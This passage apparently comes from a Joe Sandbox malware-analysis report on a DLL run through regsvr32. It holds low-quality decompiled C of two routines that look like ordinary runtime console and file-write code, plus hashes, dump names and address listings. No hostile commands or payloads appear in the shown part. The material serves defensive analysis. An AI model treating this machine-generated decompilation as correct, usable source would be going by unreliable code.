                                                                                                                                                                                                                    0x18000388c
                                                                                                                                                                                                                    0x180003891
                                                                                                                                                                                                                    0x180003896
                                                                                                                                                                                                                    0x18000389b
                                                                                                                                                                                                                    0x1800038a2
                                                                                                                                                                                                                    0x1800038be

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                    • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                    • Opcode ID: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
                                                                                                                                                                                                                    • Instruction ID: 9ead3bcba03cb9e88f6155f8408b2a39bbeb34ce68d687e28d60bbf843815124
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74613A36A04B888AEB62CF66D4413DD77A4F748B88F148216EF4917B99CF78D299C700
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 000000018000D5B8 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                                                                                    			E0000000118000D5B8(void* __eax, signed int __edx, void* __esi, void* __ebp, long long __rbx, intOrPtr* __rcx, long long __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t183;
				signed int _t187;
				signed int _t194;
				signed int _t199;
				intOrPtr _t208;
				void* _t210;
				signed char _t211;
				void* _t261;
				signed long long _t262;
				long long _t267;
				long long _t269;
				void* _t270;
				long long _t272;
				intOrPtr* _t278;
				intOrPtr* _t285;
				long long _t287;
				long long _t313;
				void* _t321;
				long long _t322;
				void* _t323;
				long long _t324;
				long long _t326;
				signed char* _t327;
				signed char* _t328;
				signed char* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				signed long long _t333;
				intOrPtr _t336;
				intOrPtr _t339;
				void* _t341;
				signed long long _t343;
				signed long long _t345;
				long long _t354;
				void* _t358;
				long long _t359;
				signed long long _t362;
				char _t363;
				signed long long _t364;
				void* _t367;
				signed char* _t368;
				signed long long _t370;

				_t261 = _t332;
				_t331 = _t261 - 0x57;
				_t333 = _t332 - 0xd0;
				 *((long long*)(_t331 - 9)) = 0xfffffffe;
				 *((long long*)(_t261 + 8)) = __rbx;
				_t262 =  *0x80021010; // 0xaaf8a09cc6d2
				 *(_t331 + 0x17) = _t262 ^ _t333;
				 *((long long*)(_t331 - 0x41)) = __r8;
				_t278 = __rcx;
				 *((long long*)(_t331 - 0x59)) =  *((intOrPtr*)(_t331 + 0x7f));
				_t362 = __edx >> 6;
				 *(_t331 - 0x39) = _t362;
				_t370 = __edx + __edx * 8;
				_t267 =  *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + 0x28 + _t370 * 8));
				 *((long long*)(_t331 - 0x19)) = _t267;
				r12d = r9d;
				_t359 = _t358 + __r8;
				 *((long long*)(_t331 - 0x61)) = _t359;
				 *((intOrPtr*)(_t331 - 0x49)) = GetConsoleOutputCP();
				if ( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x28)) != dil) goto 0x8000d658;
				0x80006f60();
				_t208 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x18)) + 0xc));
				 *((intOrPtr*)(_t331 - 0x45)) = _t208;
				 *((long long*)(__rcx)) = _t267;
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if ( *((intOrPtr*)(_t331 - 0x41)) - _t359 >= 0) goto 0x8000da03;
				_t343 = __edx >> 6;
				 *(_t331 - 0x11) = _t343;
				 *((char*)(_t331 - 0x71)) =  *((intOrPtr*)(__r8));
				 *((intOrPtr*)(_t331 - 0x6d)) = 0;
				r12d = 1;
				if (_t208 != 0xfde9) goto 0x8000d81d;
				_t285 = 0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8));
				if ( *_t285 == dil) goto 0x8000d6ca;
				_t367 = _t324 + 1;
				if (_t367 - 5 < 0) goto 0x8000d6b7;
				if (_t367 <= 0) goto 0x8000d7b3;
				r12d =  *((char*)(_t285 + 0x1800218d1));
				r12d = r12d + 1;
				_t183 = r12d - 1;
				 *((intOrPtr*)(_t331 - 0x51)) = _t183;
				_t336 = _t183;
				if (_t336 -  *((intOrPtr*)(_t331 - 0x61)) - __r8 > 0) goto 0x8000d980;
				_t287 = _t324;
				 *((char*)(_t331 + _t287 - 1)) =  *((intOrPtr*)(0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8))));
				if (_t287 + 1 - _t367 < 0) goto 0x8000d71b;
				if (_t336 <= 0) goto 0x8000d74b;
				0x80004b30();
				_t354 =  *((intOrPtr*)(_t331 - 0x59));
				_t313 = _t324;
				 *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + _t313 + 0x3e + _t370 * 8)) = dil;
				if (_t313 + 1 - _t367 < 0) goto 0x8000d74e;
				 *((long long*)(_t331 - 0x31)) = _t324;
				_t269 = _t331 - 1;
				 *((long long*)(_t331 - 0x29)) = _t269;
				_t187 = (0 | r12d == 0x00000004) + 1;
				r12d = _t187;
				r8d = _t187;
				 *((long long*)(_t333 + 0x20)) = _t354;
				E0000000118000E384(_t269, __rcx, _t331 - 0x6d, _t331 - 0x29, _t336, _t331 - 0x31);
				if (_t269 == 0xffffffff) goto 0x8000da03;
				_t326 = __r8 +  *((intOrPtr*)(_t331 - 0x51)) - 1;
				goto 0x8000d8ae;
				_t363 =  *((char*)(_t269 + 0x1800218d0));
				_t210 = _t363 + 1;
				_t270 = _t210;
				if (_t270 -  *((intOrPtr*)(_t331 - 0x61)) - _t326 > 0) goto 0x8000d9ae;
				 *((long long*)(_t331 - 0x51)) = _t324;
				 *((long long*)(_t331 - 0x21)) = _t326;
				_t194 = (0 | _t210 == 0x00000004) + 1;
				r14d = _t194;
				r8d = _t194;
				 *((long long*)(_t333 + 0x20)) = _t354;
				_t345 = _t331 - 0x51;
				E0000000118000E384(_t270, _t278, _t331 - 0x6d, _t331 - 0x21,  *((intOrPtr*)(_t331 - 0x61)) - _t326, _t345);
				if (_t270 == 0xffffffff) goto 0x8000da03;
				_t327 = _t326 + _t363;
				r12d = r14d;
				_t364 =  *(_t331 - 0x39);
				goto 0x8000d8ae;
				_t339 =  *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8));
				_t211 =  *(_t339 + 0x3d + _t370 * 8);
				if ((_t211 & 0x00000004) == 0) goto 0x8000d850;
				 *((char*)(_t331 + 7)) =  *((intOrPtr*)(_t339 + 0x3e + _t370 * 8));
				 *((char*)(_t331 + 8)) =  *_t327;
				 *(_t339 + 0x3d + _t370 * 8) = _t211 & 0x000000fb;
				r8d = 2;
				goto 0x8000d899;
				r9d =  *_t327 & 0x000000ff;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t354 + 0x18)))) + _t345 * 2)) >= 0) goto 0x8000d893;
				_t368 =  &(_t327[1]);
				if (_t368 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000d9e0;
				r8d = 2;
				if (E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t327, _t324, _t327, _t331, _t339, _t354) == 0xffffffff) goto 0x8000da03;
				_t328 = _t368;
				goto 0x8000d8ae;
				_t199 = E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t328, _t324, _t328, _t331, _t359, _t354);
				if (_t199 == 0xffffffff) goto 0x8000da03;
				_t329 =  &(_t328[1]);
				 *((long long*)(_t333 + 0x38)) = _t324;
				 *((long long*)(_t333 + 0x30)) = _t324;
				 *((intOrPtr*)(_t333 + 0x28)) = 5;
				_t272 = _t331 + 0xf;
				 *((long long*)(_t333 + 0x20)) = _t272;
				r9d = r12d;
				_t341 = _t331 - 0x6d;
				E0000000118000A154();
				r14d = _t199;
				if (_t199 == 0) goto 0x8000da03;
				 *((long long*)(_t333 + 0x20)) = _t324;
				r8d = _t199;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
				 *((intOrPtr*)(_t278 + 4)) = __esi -  *((intOrPtr*)(_t331 - 0x41)) +  *((intOrPtr*)(_t278 + 8));
				if ( *((intOrPtr*)(_t331 - 0x69)) - r14d < 0) goto 0x8000da03;
				if ( *((char*)(_t331 - 0x71)) != 0xa) goto 0x8000d966;
				 *((short*)(_t331 - 0x71)) = 0xd;
				 *((long long*)(_t333 + 0x20)) = _t324;
				_t130 = _t272 - 0xc; // 0x1
				r8d = _t130;
				_t321 = _t331 - 0x71;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
				if ( *((intOrPtr*)(_t331 - 0x69)) - 1 < 0) goto 0x8000da03;
				 *((intOrPtr*)(_t278 + 8)) =  *((intOrPtr*)(_t278 + 8)) + 1;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + 1;
				if (_t329 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000da03;
				goto 0x8000d681;
				if (_t321 <= 0) goto 0x8000d9a9;
				_t330 = _t329 - _t368;
				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + _t368 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t330 + _t368));
				if (1 - _t321 < 0) goto 0x8000d988;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) +  *((intOrPtr*)(_t278 + 4));
				goto 0x8000da03;
				if (_t341 <= 0) goto 0x8000d9da;
				_t322 = _t324;
				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 +  *(_t331 - 0x39) * 8)) + _t322 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t322 + _t330));
				_t323 = _t322 + 1;
				if (2 - _t341 < 0) goto 0x8000d9ba;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + r8d;
				goto 0x8000da03;
				 *((intOrPtr*)(_t341 + 0x3e + _t370 * 8)) = r9b;
				 *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) =  *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) | 0x00000004;
				_t173 = _t323 + 1; // 0x1
				 *((intOrPtr*)(_t278 + 4)) = _t173;
				goto 0x8000da03;
				 *_t278 = GetLastError();
				return E000000011800010B0(_t206,  *((intOrPtr*)(_t331 - 0x45)),  *(_t331 + 0x17) ^ _t333);
			}

















































                                                                                                                                                                                                                    0x18000d5b8
                                                                                                                                                                                                                    0x18000d5c6
                                                                                                                                                                                                                    0x18000d5ca
                                                                                                                                                                                                                    0x18000d5d1
                                                                                                                                                                                                                    0x18000d5d9
                                                                                                                                                                                                                    0x18000d5dd
                                                                                                                                                                                                                    0x18000d5e7
                                                                                                                                                                                                                    0x18000d5ee
                                                                                                                                                                                                                    0x18000d5f5
                                                                                                                                                                                                                    0x18000d5fc
                                                                                                                                                                                                                    0x18000d606
                                                                                                                                                                                                                    0x18000d60a
                                                                                                                                                                                                                    0x18000d618
                                                                                                                                                                                                                    0x18000d624
                                                                                                                                                                                                                    0x18000d629
                                                                                                                                                                                                                    0x18000d62d
                                                                                                                                                                                                                    0x18000d630
                                                                                                                                                                                                                    0x18000d633
                                                                                                                                                                                                                    0x18000d63d
                                                                                                                                                                                                                    0x18000d64a
                                                                                                                                                                                                                    0x18000d64f
                                                                                                                                                                                                                    0x18000d65c
                                                                                                                                                                                                                    0x18000d65f
                                                                                                                                                                                                                    0x18000d664
                                                                                                                                                                                                                    0x18000d667
                                                                                                                                                                                                                    0x18000d66e
                                                                                                                                                                                                                    0x18000d677
                                                                                                                                                                                                                    0x18000d67b
                                                                                                                                                                                                                    0x18000d683
                                                                                                                                                                                                                    0x18000d686
                                                                                                                                                                                                                    0x18000d689
                                                                                                                                                                                                                    0x18000d69c
                                                                                                                                                                                                                    0x18000d6af
                                                                                                                                                                                                                    0x18000d6ba
                                                                                                                                                                                                                    0x18000d6be
                                                                                                                                                                                                                    0x18000d6c8
                                                                                                                                                                                                                    0x18000d6cd
                                                                                                                                                                                                                    0x18000d6e1
                                                                                                                                                                                                                    0x18000d6ea
                                                                                                                                                                                                                    0x18000d6f0
                                                                                                                                                                                                                    0x18000d6f2
                                                                                                                                                                                                                    0x18000d6fc
                                                                                                                                                                                                                    0x18000d702
                                                                                                                                                                                                                    0x18000d708
                                                                                                                                                                                                                    0x18000d71d
                                                                                                                                                                                                                    0x18000d72a
                                                                                                                                                                                                                    0x18000d72f
                                                                                                                                                                                                                    0x18000d73b
                                                                                                                                                                                                                    0x18000d740
                                                                                                                                                                                                                    0x18000d74b
                                                                                                                                                                                                                    0x18000d759
                                                                                                                                                                                                                    0x18000d764
                                                                                                                                                                                                                    0x18000d766
                                                                                                                                                                                                                    0x18000d76a
                                                                                                                                                                                                                    0x18000d76e
                                                                                                                                                                                                                    0x18000d77b
                                                                                                                                                                                                                    0x18000d77d
                                                                                                                                                                                                                    0x18000d780
                                                                                                                                                                                                                    0x18000d783
                                                                                                                                                                                                                    0x18000d794
                                                                                                                                                                                                                    0x18000d79d
                                                                                                                                                                                                                    0x18000d7ab
                                                                                                                                                                                                                    0x18000d7ae
                                                                                                                                                                                                                    0x18000d7b6
                                                                                                                                                                                                                    0x18000d7bf
                                                                                                                                                                                                                    0x18000d7ca
                                                                                                                                                                                                                    0x18000d7d0
                                                                                                                                                                                                                    0x18000d7d6
                                                                                                                                                                                                                    0x18000d7da
                                                                                                                                                                                                                    0x18000d7e6
                                                                                                                                                                                                                    0x18000d7e8
                                                                                                                                                                                                                    0x18000d7eb
                                                                                                                                                                                                                    0x18000d7ee
                                                                                                                                                                                                                    0x18000d7f3
                                                                                                                                                                                                                    0x18000d7ff
                                                                                                                                                                                                                    0x18000d808
                                                                                                                                                                                                                    0x18000d80e
                                                                                                                                                                                                                    0x18000d811
                                                                                                                                                                                                                    0x18000d814
                                                                                                                                                                                                                    0x18000d818
                                                                                                                                                                                                                    0x18000d81d
                                                                                                                                                                                                                    0x18000d825
                                                                                                                                                                                                                    0x18000d82d
                                                                                                                                                                                                                    0x18000d834
                                                                                                                                                                                                                    0x18000d839
                                                                                                                                                                                                                    0x18000d83f
                                                                                                                                                                                                                    0x18000d844
                                                                                                                                                                                                                    0x18000d84e
                                                                                                                                                                                                                    0x18000d850
                                                                                                                                                                                                                    0x18000d860
                                                                                                                                                                                                                    0x18000d862
                                                                                                                                                                                                                    0x18000d86a
                                                                                                                                                                                                                    0x18000d873
                                                                                                                                                                                                                    0x18000d888
                                                                                                                                                                                                                    0x18000d88e
                                                                                                                                                                                                                    0x18000d891
                                                                                                                                                                                                                    0x18000d8a0
                                                                                                                                                                                                                    0x18000d8a8
                                                                                                                                                                                                                    0x18000d8ae
                                                                                                                                                                                                                    0x18000d8b1
                                                                                                                                                                                                                    0x18000d8b6
                                                                                                                                                                                                                    0x18000d8bb
                                                                                                                                                                                                                    0x18000d8c3
                                                                                                                                                                                                                    0x18000d8c7
                                                                                                                                                                                                                    0x18000d8cc
                                                                                                                                                                                                                    0x18000d8cf
                                                                                                                                                                                                                    0x18000d8d8
                                                                                                                                                                                                                    0x18000d8dd
                                                                                                                                                                                                                    0x18000d8e2
                                                                                                                                                                                                                    0x18000d8e8
                                                                                                                                                                                                                    0x18000d8f1
                                                                                                                                                                                                                    0x18000d907
                                                                                                                                                                                                                    0x18000d915
                                                                                                                                                                                                                    0x18000d91c
                                                                                                                                                                                                                    0x18000d926
                                                                                                                                                                                                                    0x18000d92d
                                                                                                                                                                                                                    0x18000d931
                                                                                                                                                                                                                    0x18000d93a
                                                                                                                                                                                                                    0x18000d93a
                                                                                                                                                                                                                    0x18000d93e
                                                                                                                                                                                                                    0x18000d94d
                                                                                                                                                                                                                    0x18000d957
                                                                                                                                                                                                                    0x18000d95d
                                                                                                                                                                                                                    0x18000d960
                                                                                                                                                                                                                    0x18000d96a
                                                                                                                                                                                                                    0x18000d97b
                                                                                                                                                                                                                    0x18000d983
                                                                                                                                                                                                                    0x18000d985
                                                                                                                                                                                                                    0x18000d997
                                                                                                                                                                                                                    0x18000d9a7
                                                                                                                                                                                                                    0x18000d9a9
                                                                                                                                                                                                                    0x18000d9ac
                                                                                                                                                                                                                    0x18000d9b1
                                                                                                                                                                                                                    0x18000d9b3
                                                                                                                                                                                                                    0x18000d9c8
                                                                                                                                                                                                                    0x18000d9cf
                                                                                                                                                                                                                    0x18000d9d8
                                                                                                                                                                                                                    0x18000d9da
                                                                                                                                                                                                                    0x18000d9de
                                                                                                                                                                                                                    0x18000d9e0
                                                                                                                                                                                                                    0x18000d9ed
                                                                                                                                                                                                                    0x18000d9f3
                                                                                                                                                                                                                    0x18000d9f6
                                                                                                                                                                                                                    0x18000d9f9
                                                                                                                                                                                                                    0x18000da01
                                                                                                                                                                                                                    0x18000da2c

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2718003287-0
                                                                                                                                                                                                                    • Opcode ID: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
                                                                                                                                                                                                                    • Instruction ID: d53985ea959d49848d9070d6669198272c686acab0006873b77d48ca537a322a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1CD1E332B18A8889E752CFA9D4403EC3BB1F3597D8F148216EE5D97B99DE34C60AC750
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 000000018000DEE0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    C-Code - Quality: 28%
                                                                                                                                                                                                                    			E0000000118000DEE0(void* __ebx, signed int __ecx, void* __esi, void* __ebp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
				signed long long _v88;
				void* _v96;
				void* _v108;
				signed int _v112;
				intOrPtr _v120;
				signed int _v124;
				long _v128;
				signed int _v136;
				long long _v144;
				signed int _v152;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				signed short _t99;
				void* _t107;
				long _t116;
				signed int _t117;
				void* _t122;
				signed short _t127;
				signed int _t130;
				signed short _t133;
				signed short _t159;
				signed short _t167;
				signed long long _t180;
				signed int _t184;
				signed short* _t197;
				signed int _t204;
				signed int _t205;
				signed short* _t206;
				void* _t208;
				signed long long _t220;
				void* _t221;
				signed long long _t222;
				signed long long _t223;
				void* _t224;
				signed short* _t226;

				_t197 = __rdx;
				_t122 = __ebx;
				r14d = r8d;
				_t184 = __r9;
				_t206 = __rdx;
				if (r8d == 0) goto 0x8000e1d3;
				if (__rdx != 0) goto 0x8000df47;
				 *((char*)(__r9 + 0x38)) = 1;
				r8d = 0;
				 *((intOrPtr*)(__r9 + 0x34)) = 0;
				 *((char*)(__r9 + 0x30)) = 1;
				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
				r9d = 0;
				_v144 = __r9;
				_v152 = _t205;
				E000000011800084EC(__rax, __r9, __rcx, __rdx, __rdx, _t208, __r8);
				goto 0x8000e1d5;
				_t220 = __ecx >> 6;
				_v88 = _t220;
				_t223 = __ecx + __ecx * 8;
				_t99 =  *((intOrPtr*)(0x800227f0 + 0x39 + _t223 * 8));
				_v136 = _t99;
				if (_t99 - 1 - 1 > 0) goto 0x8000df7e;
				if (( !r14d & 0x00000001) == 0) goto 0x8000df10;
				if (( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) & 0x00000020) == 0) goto 0x8000df94;
				_t23 = _t197 + 2; // 0x2
				r8d = _t23;
				E0000000118000E958(r15d);
				_v112 = _t205;
				if (E0000000118000E2E0(r15d, __ecx) == 0) goto 0x8000e0c3;
				if ( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) - dil >= 0) goto 0x8000e0c3;
				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x8000dfd3;
				0x80006f60();
				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t205) goto 0x8000dfef;
				_t180 =  *((intOrPtr*)(0x800227f0 + _t220 * 8));
				if ( *((intOrPtr*)(_t180 + 0x39 + _t223 * 8)) == dil) goto 0x8000e0c3;
				if (GetConsoleMode(??, ??) == 0) goto 0x8000e0bc;
				_t127 = _v136;
				_t159 = _t127;
				if (_t159 == 0) goto 0x8000e099;
				if (_t159 == 0) goto 0x8000e024;
				if (_t127 - 1 != 1) goto 0x8000e15d;
				_t221 = _t206 + _t224;
				_v128 = _t205;
				_t226 = _t206;
				if (_t206 - _t221 >= 0) goto 0x8000e090;
				r14d = _v124;
				_v136 =  *_t226 & 0x0000ffff;
				_t107 = E0000000118000E960( *_t226 & 0xffff);
				_t130 = _v136 & 0x0000ffff;
				if (_t107 != _t130) goto 0x8000e087;
				r14d = r14d + 2;
				_v124 = r14d;
				if (_t130 != 0xa) goto 0x8000e07c;
				if (E0000000118000E960(0xd) != 0xd) goto 0x8000e087;
				r14d = r14d + 1;
				_v124 = r14d;
				if ( &(_t226[1]) - _t221 >= 0) goto 0x8000e090;
				goto 0x8000e038;
				_v128 = GetLastError();
				_t222 = _v88;
				goto 0x8000e153;
				r9d = r14d;
				_v152 = __r9;
				E0000000118000D5B8(_t109, r15d, __esi, __ebp, __r9,  &_v128, _t206);
				asm("movsd xmm0, [eax]");
				goto 0x8000e158;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x800227f0 + _t222 * 8)) + 0x38 + _t223 * 8)) - dil >= 0) goto 0x8000e120;
				_t133 = _v136;
				_t167 = _t133;
				if (_t167 == 0) goto 0x8000e10c;
				if (_t167 == 0) goto 0x8000e0f8;
				if (_t133 - 1 != 1) goto 0x8000e164;
				r9d = r14d;
				E0000000118000DB34(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r9d = r14d;
				E0000000118000DC50(r15d,  *((intOrPtr*)(_t180 + 8)), _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r9d = r14d;
				E0000000118000DA30(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r8d = r14d;
				_v152 = _v152 & _t180;
				_v128 = _t180;
				_v120 = 0;
				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x8000e150;
				_t116 = GetLastError();
				_v128 = _t116;
				asm("movsd xmm0, [ebp-0x40]");
				asm("movsd [ebp-0x30], xmm0");
				if (_t116 != 0) goto 0x8000e1cc;
				_t117 = _v112;
				if (_t117 == 0) goto 0x8000e1a3;
				if (_t117 != 5) goto 0x8000e193;
				 *((char*)(_t184 + 0x30)) = 1;
				 *((intOrPtr*)(_t184 + 0x2c)) = 9;
				 *((char*)(_t184 + 0x38)) = 1;
				 *(_t184 + 0x34) = _t117;
				goto 0x8000df3f;
				_t204 = _t184;
				E000000011800086B0(_v112, _t204);
				goto 0x8000df3f;
				if (( *( *((intOrPtr*)(_t204 + _t222 * 8)) + 0x38 + _t223 * 8) & 0x00000040) == 0) goto 0x8000e1b4;
				if ( *_t206 == 0x1a) goto 0x8000e1d3;
				 *(_t184 + 0x34) =  *(_t184 + 0x34) & 0x00000000;
				 *((char*)(_t184 + 0x30)) = 1;
				 *((intOrPtr*)(_t184 + 0x2c)) = 0x1c;
				 *((char*)(_t184 + 0x38)) = 1;
				goto 0x8000df3f;
				goto 0x8000e1d5;
				return 0;
			}







































                                                                                                                                                                                                                    0x18000dee0
                                                                                                                                                                                                                    0x18000dee0
                                                                                                                                                                                                                    0x18000def6
                                                                                                                                                                                                                    0x18000defc
                                                                                                                                                                                                                    0x18000deff
                                                                                                                                                                                                                    0x18000df05
                                                                                                                                                                                                                    0x18000df0e
                                                                                                                                                                                                                    0x18000df10
                                                                                                                                                                                                                    0x18000df15
                                                                                                                                                                                                                    0x18000df18
                                                                                                                                                                                                                    0x18000df1e
                                                                                                                                                                                                                    0x18000df25
                                                                                                                                                                                                                    0x18000df2d
                                                                                                                                                                                                                    0x18000df30
                                                                                                                                                                                                                    0x18000df35
                                                                                                                                                                                                                    0x18000df3a
                                                                                                                                                                                                                    0x18000df42
                                                                                                                                                                                                                    0x18000df57
                                                                                                                                                                                                                    0x18000df5b
                                                                                                                                                                                                                    0x18000df5f
                                                                                                                                                                                                                    0x18000df67
                                                                                                                                                                                                                    0x18000df6c
                                                                                                                                                                                                                    0x18000df73
                                                                                                                                                                                                                    0x18000df7c
                                                                                                                                                                                                                    0x18000df84
                                                                                                                                                                                                                    0x18000df8b
                                                                                                                                                                                                                    0x18000df8b
                                                                                                                                                                                                                    0x18000df8f
                                                                                                                                                                                                                    0x18000df97
                                                                                                                                                                                                                    0x18000dfa9
                                                                                                                                                                                                                    0x18000dfb8
                                                                                                                                                                                                                    0x18000dfc2
                                                                                                                                                                                                                    0x18000dfc7
                                                                                                                                                                                                                    0x18000dfde
                                                                                                                                                                                                                    0x18000dfe0
                                                                                                                                                                                                                    0x18000dfe9
                                                                                                                                                                                                                    0x18000e004
                                                                                                                                                                                                                    0x18000e00a
                                                                                                                                                                                                                    0x18000e00e
                                                                                                                                                                                                                    0x18000e010
                                                                                                                                                                                                                    0x18000e019
                                                                                                                                                                                                                    0x18000e01e
                                                                                                                                                                                                                    0x18000e024
                                                                                                                                                                                                                    0x18000e028
                                                                                                                                                                                                                    0x18000e02c
                                                                                                                                                                                                                    0x18000e032
                                                                                                                                                                                                                    0x18000e034
                                                                                                                                                                                                                    0x18000e03f
                                                                                                                                                                                                                    0x18000e043
                                                                                                                                                                                                                    0x18000e048
                                                                                                                                                                                                                    0x18000e04f
                                                                                                                                                                                                                    0x18000e051
                                                                                                                                                                                                                    0x18000e055
                                                                                                                                                                                                                    0x18000e05d
                                                                                                                                                                                                                    0x18000e071
                                                                                                                                                                                                                    0x18000e073
                                                                                                                                                                                                                    0x18000e076
                                                                                                                                                                                                                    0x18000e083
                                                                                                                                                                                                                    0x18000e085
                                                                                                                                                                                                                    0x18000e08d
                                                                                                                                                                                                                    0x18000e090
                                                                                                                                                                                                                    0x18000e094
                                                                                                                                                                                                                    0x18000e099
                                                                                                                                                                                                                    0x18000e09c
                                                                                                                                                                                                                    0x18000e0ab
                                                                                                                                                                                                                    0x18000e0b0
                                                                                                                                                                                                                    0x18000e0b7
                                                                                                                                                                                                                    0x18000e0cc
                                                                                                                                                                                                                    0x18000e0ce
                                                                                                                                                                                                                    0x18000e0d2
                                                                                                                                                                                                                    0x18000e0d4
                                                                                                                                                                                                                    0x18000e0d9
                                                                                                                                                                                                                    0x18000e0de
                                                                                                                                                                                                                    0x18000e0e4
                                                                                                                                                                                                                    0x18000e0f1
                                                                                                                                                                                                                    0x18000e0f6
                                                                                                                                                                                                                    0x18000e0f8
                                                                                                                                                                                                                    0x18000e105
                                                                                                                                                                                                                    0x18000e10a
                                                                                                                                                                                                                    0x18000e10c
                                                                                                                                                                                                                    0x18000e119
                                                                                                                                                                                                                    0x18000e11e
                                                                                                                                                                                                                    0x18000e12b
                                                                                                                                                                                                                    0x18000e12e
                                                                                                                                                                                                                    0x18000e136
